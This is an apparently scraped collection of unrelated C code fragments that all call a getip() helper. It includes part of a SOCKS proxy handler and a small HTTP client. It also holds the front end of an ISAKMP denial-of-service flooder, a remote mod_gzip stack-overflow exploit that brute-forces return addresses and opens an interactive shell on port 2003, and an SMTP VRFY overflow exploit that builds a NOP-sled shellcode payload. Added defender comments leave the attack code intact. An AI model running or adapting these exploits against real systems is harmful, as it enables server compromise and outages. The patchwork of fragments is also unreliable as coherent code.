			RETURN(412);
		}
		if ((i = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(443);}
		if (i && (unsigned)(res = sockgetlinebuf(param, CLIENT, buf, i, 0, conf.timeouts[STRING_S])) != i){RETURN(444);};
		buf[i] = 0;
		if(!param->username)param->username = (unsigned char *)mystrdup((char *)buf);
		if ((i = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(445);}
		if (i && (unsigned)(res = sockgetlinebuf(param, CLIENT, buf, i, 0, conf.timeouts[STRING_S])) != i){RETURN(446);};
		buf[i] = 0;
		if(!param->password)param->password = (unsigned char *)mystrdup((char *)buf);
		/* Sub-negotiation reply: version 1, status 0 (success). The credentials are
		 * only checked later by authfunc; a failure there is reported via CLEANRET. */
		buf[0] = 1;
		buf[1] = 0;
		if(socksend(param->clisock, buf, 2, conf.timeouts[STRING_S])!=2){RETURN(402);}
	 }
	 if ((c = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_L], 0)) != 5) {
		RETURN(421);
         } /* version */
 }
 /* Command byte. EOF (-1) lands in the unsigned char as 255 and is rejected by the range check. */
 if( (command = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) < 1 || command > 3){command = 0; RETURN(407);} /* command */
 if(ver == 5){
	 if (sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0) == EOF) {RETURN(447);} /* reserved */
	 c = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0); /* atype */
 }
 else {
	/* SOCKS4 carries the port before the address and only supports IPv4 (atype 1). */
	if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(448);}
	buf[0] = (unsigned char) res;
	if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(449);}
	buf[1] = (unsigned char) res;
	/* Type-punned read through the byte buffer: alignment and strict-aliasing
	 * are not guaranteed by the standard; works on the platforms this targets. */
	param->sins.sin_port = param->req.sin_port = *(unsigned short*)buf;
	c = 1;
 }
 
 switch(c) {
	case 1:
		for (i = 0; i<4; i++){
			if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(450);}
			buf[i] = (unsigned char)res;
		}
		/* Reads sizeof(unsigned long) bytes from buf (8 on LP64, of which the
		 * upper four are the zeroed bytes 4..7) and truncates to s_addr. */
		param->sins.sin_addr.s_addr = param->req.sin_addr.s_addr = *(unsigned long *)buf;
		if(command==1 && !param->req.sin_addr.s_addr) {
			RETURN(422);
		}
		myinet_ntoa(param->sins.sin_addr, (char *)buf);
		break;
	case 3:
		/* Domain name: one length byte (so at most 255 characters) followed by the name. */
		if ((size = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(451);} /* nmethods */
		for (i=0; i<size; i++){ /* size < 256 */
			if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(452);}
			buf[i] = (unsigned char)res;
		}
		buf[i] = 0;
		/* Resolved here, on the proxy; getip() returning 0 is a resolution failure. */
		param->sins.sin_addr.s_addr = param->req.sin_addr.s_addr = getip(buf);
		if(command==1 && !param->req.sin_addr.s_addr) {
			RETURN(100);
		}
		break;
	default:
		RETURN(998);
 }
 /* buf now holds the target as text (dotted quad or the domain name) for logging. */
 if(param->hostname)myfree(param->hostname);
 param->hostname = (unsigned char *)mystrdup((char *)buf);
 if (ver == 5) {
	 if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(453);}
	 buf[0] = (unsigned char) res;
	 if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(454);}
	 buf[1] = (unsigned char) res;
	 param->sins.sin_port = param->req.sin_port = *(unsigned short*)buf;
 }
 else {
	/* SOCKS4 user id: a NUL-terminated string, truncated to 127 bytes regardless
	 * of how much sockgetlinebuf() actually read. */
	sockgetlinebuf(param, CLIENT, buf, BUFSIZE - 1, 0, conf.timeouts[STRING_S]);
	buf[127] = 0;
	if(!param->srv->nouser && *buf && !param->username)param->username = (unsigned char *)mystrdup((char *)buf);
	/* SOCKS4a: a destination of 0.0.0.x signals that a host name follows the user id. */
	if(param->sins.sin_addr.s_addr && ntohl(param->sins.sin_addr.s_addr)<256){
		param->service = S_SOCKS45;
		sockgetlinebuf(param, CLIENT, buf, BUFSIZE - 1, 0, conf.timeouts[STRING_S]);
		buf[127] = 0;
		if(param->hostname)myfree(param->hostname);
		param->hostname = (unsigned char *)mystrdup((char *)buf);
		param->sins.sin_addr.s_addr = param->req.sin_addr.s_addr = getip(buf);
	}
 }
 if(command == 1 && !param->req.sin_port) {RETURN(424);}
 param->sins.sin_family = AF_INET;
 /* For BIND and UDP ASSOCIATE the proxy-side socket is created now and bound
  * to the server's external address (extip/extport) below. */
 switch(command) { 
	case 1:
	 param->operation = CONNECT;
	 break;
 	case 2:
	 param->sins.sin_addr.s_addr = param->extip;
	 param->sins.sin_port = param->extport?param->extport:param->req.sin_port;
	 if ((param->remsock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {RETURN (11);}
	 param->operation = BIND;
	 break;
	case 3:
	 param->sins.sin_port = param->extport?param->extport:param->req.sin_port;
	 param->sins.sin_addr.s_addr = param->extip;
	 if ((param->remsock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == INVALID_SOCKET) {RETURN (11);}
	 param->operation = UDPASSOC;
	 break;
	default:
	 RETURN(997);
 }

 /* Access control / authentication happens here, after the request is fully
  * parsed and before any proxy-side socket is bound or connected. */
 if((res = (*param->srv->authfunc)(param))) {RETURN(res);}

 if(command > 1) {
	/* Bind to the requested port first; fall back to an ephemeral port (0) if that fails. */
	if(bind(param->remsock,(struct sockaddr *)&param->sins,sizeof(param->sins))) {
		param->sins.sin_port = 0;
		if(bind(param->remsock,(struct sockaddr *)&param->sins,sizeof(param->sins)))RETURN (12);
#if SOCKSTRACE > 0
fprintf(stderr, "%s:%hu binded to communicate with server\n",
			inet_ntoa(param->sins.sin_addr),
			ntohs(param->sins.sin_port)
	);
fflush(stderr);
#endif
	}
	sasize = sizeof(struct sockaddr_in);
	getsockname(param->remsock, (struct sockaddr *)&param->sins,  &sasize);
	if(command == 3) {
		/* UDP ASSOCIATE: the TCP connection becomes the control channel and a
		 * fresh UDP socket on the internal address (intip) talks to the client. */
		param->ctrlsock = param->clisock;
		param->clisock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
		if(param->clisock == INVALID_SOCKET) {RETURN(11);}
		sin.sin_family = AF_INET;
		sin.sin_addr.s_addr = param->srv->intip;
		sin.sin_port = htons(0);
		if(bind(param->clisock,(struct sockaddr *)&sin,sizeof(struct sockaddr_in))) {RETURN (12);}
#if SOCKSTRACE > 0
fprintf(stderr, "%s:%hu binded to communicate with client\n",
			inet_ntoa(sin.sin_addr),
			ntohs(sin.sin_port)
	);
fflush(stderr);
#endif
	}
 }
 param->res = 0;

CLEANRET:

 /* Reply to the client with param->res mapped onto the protocol's status byte
  * (res % 10 for SOCKS5, 90 + res % 10 for SOCKS4), then, on success, perform
  * the command. For UDP ASSOCIATE the reply goes over the control socket. */
 if(param->clisock != INVALID_SOCKET){
	sasize = sizeof(struct sockaddr_in);
	if(command != 3) getsockname(param->remsock, (struct sockaddr *)&sin,  &sasize);
	else getsockname(param->clisock, (struct sockaddr *)&sin,  &sasize);
#if SOCKSTRACE > 0
fprintf(stderr, "Sending confirmation to client with code %d for %s with %s:%hu\n",
			param->res,
			commands[command],
			inet_ntoa(sin.sin_addr),
			ntohs(sin.sin_port)
	);
fflush(stderr);
#endif
	if(ver == 5){
		buf[0] = 5;
		buf[1] = param->res%10;
		buf[2] = 0;
		buf[3] = 1;
		memcpy(buf+4, &sin.sin_addr.s_addr, 4);
		memcpy(buf+8, &sin.sin_port, 2);
		socksend((command == 3)?param->ctrlsock:param->clisock, buf, 10, conf.timeouts[STRING_S]);
	}
	else{
		buf[0] = 0;
		buf[1] = 90 + (param->res%10);
		memcpy(buf+2, &sin.sin_port, 2);
		memcpy(buf+4, &sin.sin_addr.s_addr, 4);
		socksend(param->clisock, buf, 8, conf.timeouts[STRING_S]);
	}

	if (param->res == 0) {
		switch(command) {
			case 1:
				/* Hand-off: redirectfunc takes over the connection (and, presumably,
				 * the freeparam() responsibility); buf is released before leaving. */
				if(param->redirectfunc){
					if(buf)myfree(buf);
					return (*param->redirectfunc)(param);
				}
				param->res = sockmap(param, conf.timeouts[CONNECTION_L]);
				break;
			case 2:
				listen (param->remsock, 1);
				
				/* Wait for the inbound connection, or for the client to close/send
				 * on the control connection, whichever comes first. */
				fds[0].fd = param->remsock;
				fds[1].fd = param->clisock;
				fds[0].events = fds[1].events = POLLIN;
				res = poll(fds, 2, conf.timeouts[(param->req.sin_addr.s_addr)?CONNECTION_S:CONNECTION_L] * 1000);
				if (res < 1 || fds[1].revents) {
					/* NOTE(review): assigns the local res, unlike the sibling branches
					 * which set param->res; code 460 is therefore never reported. */
					res = 460;
					break;
				}
				sasize = sizeof(param->sins);
				s = accept(param->remsock, (struct sockaddr *)&param->sins, &sasize);
				closesocket(param->remsock);
				param->remsock = s;
				if(s == INVALID_SOCKET) {
					param->res = 462;
					break;
				}
				/* If the client named an expected peer, only accept a connection from it. */
				if(param->req.sin_addr.s_addr && param->req.sin_addr.s_addr != param->sins.sin_addr.s_addr) {
					param->res = 470;
					break;
				}
#if SOCKSTRACE > 0
fprintf(stderr, "Sending incoming connection to client with code %d for %s with %s:%hu\n",
			param->res,
			commands[command],
			inet_ntoa(param->sins.sin_addr),
			ntohs(param->sins.sin_port)
	);
fflush(stderr);
#endif
				/* Second BIND reply: reuses the status bytes set above, with the peer's address. */
				if(ver == 5){
					memcpy (buf+4, &param->sins.sin_addr, 4);
					memcpy (buf+8, &param->sins.sin_port, 2);
					socksend(param->clisock, buf, 10, conf.timeouts[STRING_S]);
				}
				else {
					memcpy (buf+2, &param->sins.sin_port, 2);
					memcpy (buf+4, &param->sins.sin_addr, 4);
					socksend(param->clisock, buf, 8, conf.timeouts[STRING_S]);
				}

				param->res = sockmap(param, conf.timeouts[CONNECTION_S]);
				break;
			case 3:
				param->sins.sin_addr.s_addr = param->req.sin_addr.s_addr;
				param->sins.sin_port = param->req.sin_port;
				/* Swap to the large buffer: the relay reads whole datagrams (up to 65535
				 * bytes), so LARGEBUFSIZE is assumed to be at least that — TODO confirm. */
				myfree(buf);
				if(!(buf = myalloc(LARGEBUFSIZE))) {RETURN(21);}

				/* Relay loop: fds[0] remote UDP, fds[1] client UDP, fds[2] TCP control.
				 * Any activity on the control connection ends the association. */
				for(;;){
					fds[0].fd = param->remsock;
					fds[1].fd = param->clisock;
					fds[2].fd = param->ctrlsock;
					fds[2].events = fds[1].events = fds[0].events = POLLIN;

					res = poll(fds, 3, conf.timeouts[CONNECTION_L]*1000);
					if(res <= 0) {
						param->res = 463;
						break;
					}
					if (fds[2].revents) {
						param->res = 0;
						break;
					}
					if (fds[1].revents) {
						/* Client -> server: parse the SOCKS5 UDP header (RSV RSV FRAG ATYP ADDR PORT)
						 * and forward the payload. A datagram must be longer than the 10-byte
						 * IPv4 header to be accepted. */
						sasize = sizeof(struct sockaddr_in);
						if((len = recvfrom(param->clisock, buf, 65535, 0, (struct sockaddr *)&sin, &sasize)) <= 10) {
							param->res = 464;
							break;
						}
						/* Only datagrams from the IP that opened the association are relayed;
						 * the source port is not checked. */
						if(sin.sin_addr.s_addr != param->sinc.sin_addr.s_addr){
							param->res = 465;
							break;
						}
						/* Fragmentation (FRAG != 0) is not supported. */
						if(buf[0] || buf[1] || buf[2]) {
							param->res = 466;
							break;
						}
						switch(buf[3]) {
							case 1:
								i = 8;
								memcpy(&param->sins.sin_addr.s_addr, buf+4, 4);
								break;
							case 3:
								/* Shift the name down over its length byte and NUL-terminate it.
								 * The loop is bounded by the length byte (<= 255), not by len, so
								 * it may read header bytes beyond the datagram (still inside buf);
								 * the len > i check below then suppresses the forward. */
								size = buf[4];
								for (i=4; size; i++, size--){
									buf[i] = buf[i+1];
								}
								buf[i++] = 0;
								param->sins.sin_addr.s_addr = getip(buf+4);
								break;
							default:
								RETURN(996);
						 }

						memcpy(&param->sins.sin_port, buf+i, 2);
						i+=2;

						sasize = sizeof(param->sins);
						if(len > (int)i){
							if(socksendto(param->remsock, &param->sins, buf+i, len - i, conf.timeouts[SINGLEBYTE_L]*1000) <= 0){
								param->res = 467;
								break;
							}
							param->statscli+=(len - i);
							param->nwrites++;
#if SOCKSTRACE > 1
fprintf(stderr, "UDP packet relayed from client to %s:%hu size %d, header %d\n",
			inet_ntoa(param->sins.sin_addr),
			ntohs(param->sins.sin_port),
			(len - i),
			i
	);
fprintf(stderr, "client address is assumed to be %s:%hu\n",
			inet_ntoa(sin.sin_addr),
			ntohs(sin.sin_port)
	);
fflush(stderr);
#endif
						}

					}
					if (fds[0].revents) {
						/* Server -> client: prepend a 10-byte IPv4 SOCKS5 UDP header carrying
						 * the sender's address and send to the client address recorded in sin. */
						struct sockaddr_in tsin;
						sasize = sizeof(tsin);
						buf[0]=buf[1]=buf[2]=0;
						buf[3]=1;
						if((len = recvfrom(param->remsock, buf+10, 65535 - 10, 0, (struct sockaddr *)&tsin, &sasize)) <= 0) {
							param->res = 468;
							break;
						}
						param->statssrv+=len;
						param->nreads++;
						memcpy(buf+4, &tsin.sin_addr.s_addr, 4);
						memcpy(buf+8, &tsin.sin_port, 2);
						sasize = sizeof(param->sins);
						if(socksendto(param->clisock, &sin, buf, len + 10, conf.timeouts[SINGLEBYTE_L]*1000) <=0){
							param->res = 469;
							break;
						}
#if SOCKSTRACE > 1
fprintf(stderr, "UDP packet relayed to client from %s:%hu size %d\n",
			inet_ntoa(tsin.sin_addr),
			ntohs(tsin.sin_port),
			len
	);
fflush(stderr);
#endif

					}
				}
				break;
			default:
				param->res = 417;
				break;
		}
	}
 }
 
 /* Log line: "<command> <host or dotted quad>:<port>". command is clamped so
  * commands[] is never indexed out of range, and the host name is capped at
  * 265 characters so the line fits in buf. */
 if(command > 3) command = 0;
 if(buf){
	 sprintf((char *)buf, "%s ", commands[command]);
	 if(param->hostname){
	  sprintf((char *)buf + strlen((char *)buf), "%.265s", param->hostname);
	 }
	 else myinet_ntoa(param->req.sin_addr, (char *)buf+strlen((char *)buf));
         sprintf((char *)buf+strlen((char *)buf), ":%hu", ntohs(param->req.sin_port));
	 (*param->srv->logfunc)(param, buf);
	 myfree(buf);
 }
 freeparam(param);
 return (NULL);
}
/* Command-line front end of the tool: parses the long/short options, opens a raw
 * IP socket with IP_HDRINCL and calls isakmp_dos() (defined elsewhere) with the
 * collected parameters. usage() is expected to exit (not visible here). Returns 1
 * after isakmp_dos() returns; socket errors exit with status 0. */
int main(int argc, char **argv){
	char *version = "0.3a";
	u_long source, destination;     /* assigned only by -s/-d; use is guarded by src_ok/dst_ok */
	int lineopt, 
	    port = 0, 
	    nb, 
	    nbs = 1,
	    loop = 0,
	    number = 0,
	    pkt_len,
	    src_ok = 0,
	    dst_ok = 0,
	    length = 0;

	printf("--- nb-isakmp.c v.%s / Nelson Brito / Independent Security Consultant ---\n", version);

	/* A conditional expression used as a statement; the else branch is a no-op. */
	(argc < 4) ? usage(argv[0]) : (char *)NULL;

	/* SIGKILL cannot be caught or ignored: that signal() call fails and its
	 * return value is not checked. */
	signal(SIGHUP,  SIG_IGN);
	signal(SIGINT,  u_abort);
	signal(SIGTERM, u_abort);
	signal(SIGKILL, u_abort);
	signal(SIGQUIT, u_abort);

	while(1){
		static struct option my_opt[]={
			{"source",	1, 0, 's'},
			{"destination",	1, 0, 'd'},
			{"port",	1, 0, 'p'},
			{"number",	1, 0, 'n'},
			{"length",	1, 0, 'l'},
			{"loop",	0, 0, 'L'},
			{"help",	0, 0, 'h'},
			{0,		0, 0, 0}
		};

		int option_index = 0;
		lineopt = getopt_long(argc, argv, "s:d:p:n:l:Lh", my_opt, &option_index);

		if(lineopt == -1) break;

		switch(lineopt){
			case 's':
				source = getip(optarg); src_ok =1; break;
			case 'd':
				destination = getip(optarg); dst_ok = 1; break;
			case 'p':
				/* The break precedes the range check, so the check below is unreachable
				 * and out-of-range port values are never rejected. atoi() gives 0 for
				 * non-numeric input. */
				port = atoi(optarg); break;
				if((port <= 0) || (port > 65535)){
					printf("main(): port range error.\n");
				}
			case 'n':
				number = atoi(optarg); break;
			case 'l':
				length = atoi(optarg); break;
			case 'L':
				loop = 1; break;
			case 'h':
			default:
				usage(argv[0]); break;
		}
	}

	if((!src_ok) || (!dst_ok)) usage(argv[0]);

	/* Raw socket with a caller-supplied IP header: needs root / CAP_NET_RAW. */
	if((nb = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))< 0){
		printf("main(): socket() error.\n");
		exit(0);
	}
	
	if(setsockopt(nb, IPPROTO_IP, IP_HDRINCL, (char *)&nbs, sizeof(nbs)) < 0){
		printf("main(): setsockopt() error.\n");
		exit(0);
	}

	/* 0 (no -l given) falls back to the compile-time ISAKMP_LEN. */
	pkt_len = length ? length : ISAKMP_LEN;

	isakmp_dos(nb, source, destination, port, number, loop, pkt_len);

	printf("\nRock my world, baby!\n");
	return(1);
}
Beispiel #25
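/* Minimal HTTP/1.1 fetch: resolve argv[1] with getip() (project code returning
 * a dotted-quad string, or 0 on failure), connect to port 80, send
 * "GET <argv[2]> HTTP/1.1" and copy the raw response to stdout.
 * Exits 1 on a usage error or any socket failure; returns 0 otherwise. */
int main(int argc, char * argv[]) 
{

    int n;
    int s;
    size_t sent;
    size_t reqlen;
    char line[MAXSIZE];
    char buf[BUFSIZ + 1];

    struct sockaddr_in addr;

    char * ip;

    /* Both arguments are used below; the original dereferenced them unchecked. */
    if (argc < 3) {
    	fprintf(stderr, "usage: %s <host> <path>\n", argv[0]);
    	exit(1);
    }
       
    if (( s = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
    	perror("Socket");
    	exit(1);
    }
    memset(&addr, 0, sizeof addr);
    addr.sin_family = AF_INET;
    addr.sin_port = htons(80);

    ip = getip(argv[1]);
    if (ip == 0) {
    	printf("Invalid host\n");
    	exit(1);
    }
    
    if (inet_pton(AF_INET, ip, &addr.sin_addr) <= 0) {
    	perror("inet_pton");
    	exit(1);
    }
    
    //Connect to the server
    if (connect(s, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) < 0) {
    	perror("Connect");
    	exit(1);
    }

    printf("Connected to host\n");

    /* snprintf() bounds the request line; the original sprintf() could overflow
     * line[] with a long path. Truncation is reported rather than sent. */
    n = snprintf(line, sizeof line, "GET %s HTTP/1.1\r\nConnection: close\r\n\r\n",
    	    argv[2]);
    if (n < 0 || (size_t)n >= sizeof line) {
    	fprintf(stderr, "Request path too long\n");
    	exit(1);
    }
    reqlen = (size_t)n;

    printf("Sending request... \n===\n%s===\n", line);

    //Send the query to the server; send() may write less than asked, so loop.
    for (sent = 0; sent < reqlen; sent += (size_t)n) {
        n = send(s, line + sent, reqlen - sent, 0);
        if (n < 0) {
          perror("Can't send query");
          exit(1);
        }
    }

    printf("receiving...\n");
    /* Write exactly the bytes received. The original passed buf as the printf
     * format string (a format-string bug with attacker-controlled response data)
     * and stopped at the first NUL byte, which truncated binary bodies. */
    while((n = recv(s, buf, BUFSIZ, 0)) > 0){
    	fwrite(buf, 1, (size_t)n, stdout);
    }
    if (n < 0) {
    	perror("recv");
    }
    close(s);

    return 0;
}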
Beispiel #26
/*
 * Client for a remote stack overflow in mod_gzip's debug mode (see the
 * banner printed below).  Kept as-is; comments only.
 *
 * Options are scanned positionally on argv[i][1]: -h <host>, -p <port>,
 * -t <index into targets[]>, -r 0x<ret>, -b 0x<ret> (brute-force mode),
 * -s <step>.  targets[], fmt, STEP, usage() and getip() are defined outside
 * this block.
 *
 * Each pass of the do/while: connect to victim:port, fill buf1 (0x90 bytes,
 * the target's `jmp` string, more 0x90, ret_err and 100 copies of ret) and
 * buf2 (0x90 bytes plus the target's shellcode), format both through `fmt`
 * into tmp and write it; then sleep 2 s and try to connect to shellport.
 * If that connect succeeds, stdin and the socket are relayed with select()
 * until the peer closes.  In brute-force mode ret is decremented by `step`
 * after every attempt and the loop repeats.
 *
 * Defender's view: the request body carries long runs of 0x90 and the
 * program expects a listener on TCP/2003 of the target to appear right
 * after the request -- both are observable on the wire and on the host.
 */
int main(int argc, char **argv) {
 
    	int i=0;     
    	struct sockaddr_in sockstruct;
    	struct hostent *HOST;		/* unused */
    	char tmp[20000];		/* formatted request; later the relay buffer */
	char buf1[5000],buf2[10000];
    	int sock;
    	fd_set  rset;
	int port=80,shellport=2003;	/* shellport: where a listener is expected afterwards */
	int step=STEP;			/* brute-force decrement, overridable with -s */
	char *victim=NULL;
	long ret=0xbfffffff,ret_err;
	int brutemode=0;
	char *shellcode,*jmp;
	int trg=0;			/* index into targets[] */

printf("\nremote exploit for mod_gzip (debug_mode) [Linux/*BSD]\n\t\t by xCrZx [crazy_einstein] /05.06.03/\n");

	/* NOTE(review): every argument, argv[0] included, is read at [1]
	 * (undefined for an empty string), and argv[i+1] is not checked for
	 * NULL when the flag is the last argument.  The -t index is not
	 * bounds-checked against targets[]. */
	for(i=0;i<argc;i++) {
		if(argv[i][1]=='h') victim=argv[i+1];
		if(argv[i][1]=='p') port=atoi(argv[i+1]);
		if(argv[i][1]=='t') {ret=targets[atoi(argv[i+1])].ret;trg=atoi(argv[i+1]);}
               	if(argv[i][1]=='r') sscanf(argv[i+1],"0x%x",&ret);	/* %x stores an unsigned int into a long */
		if(argv[i][1]=='b') { brutemode=1; ret=strtoul(argv[i+1],0,16);}
		if(argv[i][1]=='s') { step=atoi(argv[i+1]);}
	}

	if(!victim || ret==0) usage(argv[0]);

	/* Per-target constants; -r/-b override only `ret`, not these. */
	ret_err=targets[trg].std_err;
	shellcode=targets[trg].shellcode;
	jmp=targets[trg].jmp;

	printf("\nUsing: ret_err = 0x%x, ret = 0x%x",ret_err,ret);	/* %x with long arguments (-Wformat) */
	if(brutemode) printf(" ,step = %d\n",step);
	
	printf("\n");
	
	if(brutemode)printf("[~] Brutemode activated!\n");

	do {
    	
    	/* First connection: the request carrying buf1/buf2.  sockstruct is
    	 * not zeroed here, so sin_zero is indeterminate on this connect. */
    	sock=socket(PF_INET,SOCK_STREAM,0);
    	sockstruct.sin_family=PF_INET; 
    	sockstruct.sin_addr.s_addr=getip(victim);
    	sockstruct.sin_port=htons(port);

    	if(!brutemode)printf("\n[!] Connecting to %s:%d\n",victim,port);
   
      	if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {

        	if(!brutemode)printf("[+] Connected!\n",i);	/* `i` has no matching conversion */

		memset(tmp ,0x00,sizeof tmp );
               	memset(buf1,0x00,sizeof buf1);
	       	memset(buf2,0x00,sizeof buf2);

		/* buf1 is grown by appending at strlen(buf1) each step, so every
		 * piece must be free of zero bytes for the next append to land
		 * after it: 2016 x 0x90, jmp, 2280 x 0x90, ret_err, 100 x ret. */
		memset(buf1,0x90,2016);
		memcpy(buf1+strlen(buf1),jmp,strlen(jmp));
		memset(buf1+strlen(buf1),0x90,2280);
		*(long *)&buf1[strlen(buf1)]=ret_err;
		for(i=0;i<100;i++) *(long *)&buf1[strlen(buf1)]=ret;

		/* buf2: 1000 x 0x90 followed by the target's shellcode string. */
		memset(buf2,0x90,1000);
		memcpy(buf2+strlen(buf2),shellcode,strlen(shellcode));
		
		/* fmt (outside this block) takes buf1, the host, strlen(buf2) and
		 * buf2 -- presumably the request template.  tmp is 20000 bytes;
		 * nothing here checks that the formatted result fits. */
		sprintf(tmp,fmt,buf1,victim,strlen(buf2),buf2);
		write(sock,tmp,strlen(tmp));	/* return value unchecked */

      	}else { printf("[x] Error: Could not connect to %s:%d!\n",victim,port);exit(0);}
    
      	close(sock);

	ret-= step;	/* runs in both modes; only matters when the loop repeats */

	if(brutemode) {printf(".");fflush(stdout);}
	

	if(!brutemode) {	
		printf("[*] Trying to connect to %s:%d port!!! Pray for success!\n",victim,shellport);
		printf("[*] Sleeping at 2 seconds...\n");
	}
	
	sleep(2);
	
	/* Second connection: probe shellport on the same host. */
       	sock=socket(PF_INET,SOCK_STREAM,0);

	bzero(sockstruct.sin_zero,sizeof(sockstruct.sin_zero));
	sockstruct.sin_family=PF_INET; 
       	sockstruct.sin_addr.s_addr=getip(victim);
       	sockstruct.sin_port=htons(shellport);

       	if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {
	        printf("\n[!] Shell is accessible!\n\n");
	        write(sock, "id;uname -a\n", 12); 
	        /* Relay loop: select() with no timeout on the socket and stdin;
	         * its return value is not checked.  The only exit is the peer
	         * closing the socket (exit(0) below). */
	        while (1) {
	                FD_ZERO(&rset);
	                FD_SET(sock,&rset);
	                FD_SET(STDIN_FILENO,&rset);
	                select(sock + 1, &rset, NULL, NULL, NULL);

       			if (FD_ISSET(sock, &rset)) {
	                        i = read(sock, tmp, sizeof(tmp) - 1);
	                        if (i <= 0) {
	                                printf("[!] Connection closed.\n");
	                                close(sock);
	                                exit(0);
	                        }
                        tmp[i] = 0;	/* read() leaves room for this terminator */
                        printf("%s", tmp);
	                }
        	        if (FD_ISSET(STDIN_FILENO, &rset)) {
                	        i = read(STDIN_FILENO, tmp, sizeof(tmp) - 1);
                        	if (i > 0) {
                                	tmp[i]=0;
	                                write(sock, tmp, i);
        	                }
                	}
	        }
       	} else if(!brutemode)printf("[x] Shell is inaccessible..\n\n");

       	close(sock);

	} while ( brutemode );	/* single pass unless -b was given */

      
    	return 0;
}
int main(void) {
	/* Look up the fixed dyndns URL through the project's getip() helper
	 * (declared outside this block); its result is not inspected. */
	static char lookup_url[] = "www.3322.org/dyndns/getip";
	getip(lookup_url);
	return 0;
}
/*
 * Pre-C99 implicit-int main(): client for an SMTP VRFY buffer overflow,
 * built for both Winsock (the #ifndef UNIX branches) and POSIX.  Kept
 * as-is; comments only.
 *
 * argv[1] target host (resolved by getip()); argv[2] an "http" string of at
 * most 60 bytes whose every byte is incremented before it is appended to
 * the payload; argv[3] the return address as 0x....  OFFSET, LENGTH,
 * CODEOFFSET, controlcode, code, dir, usages(), getip(), SLEEP() and
 * CLOSE() are defined outside this block.
 *
 * Payload layout in `buffer`: "VRFY " then 7000 bytes of 0x90, the return
 * address at OFFSET and `controlcode` 8 bytes after it, a NUL at LENGTH,
 * and `code` at CODEOFFSET followed by argv[2] and `dir`.
 *
 * Defender's view: the observable artifact is a VRFY command on TCP/25
 * whose argument is several kilobytes long and dominated by 0x90 bytes.
 */
main (int argc, char *argv[])
{
  int sock,targethost,sinlen;
  struct sockaddr_in sin;
  static unsigned char buffer[20000];	/* the payload; static so it lives off the stack */
  unsigned char *ptr,*ptr2;
  unsigned long ret_addr;
  int len,x = 1;
  unsigned long rw_mem;			/* unused */


#ifndef UNIX
  WORD wVersionRequested;
  WSADATA wsaData;
  int err;

  wVersionRequested = MAKEWORD( 2, 2 );
  err = WSAStartup( wVersionRequested, &wsaData );
  if (err != 0) exit(1);
#endif
  if (argc < 4) usages(argv[0]);


  targethost = getip(argv[1]);


   len = strlen(argv[2]);
    if (len > 60)
     {
       printf("Bad http format!\n");
       usages(argv[0]);
     }

   /* Increment every byte of argv[2] in place (the author called this
    * "encrypting" it); the payload expects the shifted form. */
   ptr = argv[2];
   while (x <= len)
      {
        x++;
        (*ptr)++;
        ptr++;
      }

  /* NOTE(review): %x expects an unsigned int*, not the unsigned long* passed
   * here (width mismatch on LP64), and sscanf() returns EOF (-1) on empty
   * input, which the == 0 test lets through. */
  if( (sscanf(argv[3],"0x%x",(unsigned long *) &ret_addr)) == 0)
    {
      printf("Input error, the return address has incorrect format\n");
      exit(0);
    }


  sock = socket(AF_INET,SOCK_STREAM,0);	/* return value unchecked */

  /* sin is not zeroed; only these three fields are set. */
  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = targethost;
  sin.sin_port = htons(25);
  sinlen = sizeof(sin);


  printf("Starting to create the egg\n");
  ptr = (char *)&buffer;
  strcpy(ptr,"VRFY ");
  ptr+=5;		/* ptr now marks the start of the VRFY argument */

  memset((void *)ptr, 0x90, 7000);
  ptr2=ptr;

  /* Return address at OFFSET, controlcode 8 bytes later. */
  ptr2+=OFFSET;
  memcpy ((void *) ptr2,(void *)&ret_addr, 4);
  ptr2+=8;
  /* Put the code on the stack that transfers control to our code */
  memcpy((void *) ptr2, (void *)&controlcode, (sizeof(controlcode)-1) );

  /* NUL at LENGTH bounds what strlen() sees when the buffer is sent below. */
  ptr2=ptr;
  ptr2+=LENGTH;
  (*ptr2)=0x00;


  ptr+=CODEOFFSET;
  memcpy((void *) ptr,(void *)&code,strlen(code));


  /* NOTE(review): "(char *) ptr2 = ..." assigns through a cast -- a GCC
   * extension removed in GCC 4; current compilers reject it (here and
   * below).  The byte after the 0xb1 marker in `code` is raised by
   * len + sizeof(dir). */
  (char *) ptr2 = strstr(ptr,"\xb1");
  if (ptr2 == NULL)
     {
       printf("Bad shell code\n");
       exit(0);
     }
  ptr2++;
  (*ptr2)+= len + ( sizeof(dir) );

   /* Likewise the byte two past the 0x83 0xc6 marker is raised by len + 8. */
   (char *) ptr2 = strstr(ptr,"\x83\xc6");
     if (ptr2 == NULL)
      {
        printf("Bad shell code\n");
        exit(0);

      }

  ptr2+= 2;

  (*ptr2)+= len + 8;

  /* Append the (shifted) argv[2] bytes and dir directly after code. */
  ptr+=strlen(code);
  memcpy((void *) ptr, (void *) argv[2], len);
  ptr+=len;
  memcpy((void *) ptr,(void*) &dir, (sizeof(dir)-1) );

  printf("Made the egg\n");

